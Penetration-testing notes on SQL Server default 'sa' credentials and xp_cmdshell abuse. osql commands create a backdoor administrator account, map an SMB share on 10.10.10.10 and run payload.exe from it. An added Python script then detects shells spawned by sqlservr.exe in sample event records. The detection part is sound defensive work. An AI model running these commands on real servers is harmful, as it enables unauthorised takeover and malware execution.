Authentication modes:

Choose an authentication mode - SQL Server

sa:<blank> or sa:sa are the default credentials for SQL Server (database) authentication

Trusted (Windows) authentication is domain-based and requires the user to be in the correct group

Metasploit mssql_enum module

osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell 'net user bob @BobLab1 /add'"
osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell 'net user'"
osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell 'net localgroup administrators bob /add'"
osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell 'net localgroup administrators'"

Then RDP to the system, OR run a payload from an SMB share:

osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell 'net use z: \\10.10.10.10\bob BobLab1 /USER:10.10.10.10\bob'"
osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell 'Z:\payload.exe'"

OR execute malicious PowerShell
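Every command in these notes is handed to cmd.exe (or PowerShell) as a direct child of the SQL Server service process, which is what a defender watches for. The following is an added detection example, not part of the original notes: it runs over constructed process-creation records (field names borrowed from Windows Security event 4688; the paths and the `analyse`/`payload_of` helpers are assumptions) and flags shells spawned by sqlservr.exe, tagging the steps shown above.

```python
import re
# xp_cmdshell runs its argument as "%ComSpec% /c <command>", so each command in the
# notes above shows up as cmd.exe (or powershell.exe) spawned directly by sqlservr.exe.
SQL_SERVICE = "sqlservr.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Tags for the post-exploitation steps shown in the notes above.
PATTERNS = [
    ("local_account_created", re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("added_to_administrators", re.compile(r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("remote_share_mapped", re.compile(r"\bnet1?\s+use\s+[a-z]:\s+\\\\", re.I)),
    ("exe_run_from_drive_or_unc_path", re.compile(r'^"?(?:[a-z]:\\|\\\\)[^"\s]*\.exe\b', re.I)),
]
def basename(path):
    return path.rsplit("\\", 1)[-1].lower()
def payload_of(cmdline):
    # cmd.exe: the command it was asked to run is everything after the first /c or /k.
    m = re.search(r"\s/[ck]\s+(.*)$", cmdline, re.I | re.S)
    if m:
        return m.group(1).strip()
    # Other shells: drop the quoted executable path and keep only its arguments.
    return re.sub(r'^\s*"[^"]*"\s*', "", cmdline).strip()
def analyse(events):
    # Flag any shell whose parent is the SQL Server service and tag what it was asked to do.
    findings = []
    for idx, ev in enumerate(events):
        if basename(ev.get("ParentProcessName", "")) != SQL_SERVICE:
            continue
        child = basename(ev.get("NewProcessName", ""))
        if child not in SHELLS:
            continue
        payload = payload_of(ev.get("CommandLine", ""))
        tags = [tag for tag, rx in PATTERNS if rx.search(payload)]
        if child != "cmd.exe":
            tags.append("powershell_spawned_by_sql_server")
        findings.append({"event": idx, "child": child, "payload": payload, "tags": tags})
    return findings
# Constructed sample records shaped like Windows Security event 4688 fields (not real telemetry).
_SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
_CMD = r"C:\Windows\system32\cmd.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentProcessName": _SQL, "NewProcessName": _CMD, "CommandLine": f'"{_CMD}" /c net user bob @BobLab1 /add'},
    {"ParentProcessName": _SQL, "NewProcessName": _CMD, "CommandLine": f'"{_CMD}" /c net localgroup administrators bob /add'},
    {"ParentProcessName": _SQL, "NewProcessName": _CMD, "CommandLine": f'"{_CMD}" /c net use z: \\\\10.10.10.10\\bob BobLab1 /USER:10.10.10.10\\bob'},
    {"ParentProcessName": _SQL, "NewProcessName": _CMD, "CommandLine": f'"{_CMD}" /c Z:\\payload.exe'},
    {"ParentProcessName": r"C:\Windows\explorer.exe", "NewProcessName": _CMD, "CommandLine": f'"{_CMD}" /c net user'},  # not from SQL Server
    {"ParentProcessName": _SQL, "NewProcessName": _PS, "CommandLine": f'"{_PS}" -NoProfile -Command Get-Process'},
]
```

Any shell under sqlservr.exe is worth a finding even with no tag, since a hardened server has xp_cmdshell disabled and no reason to spawn one.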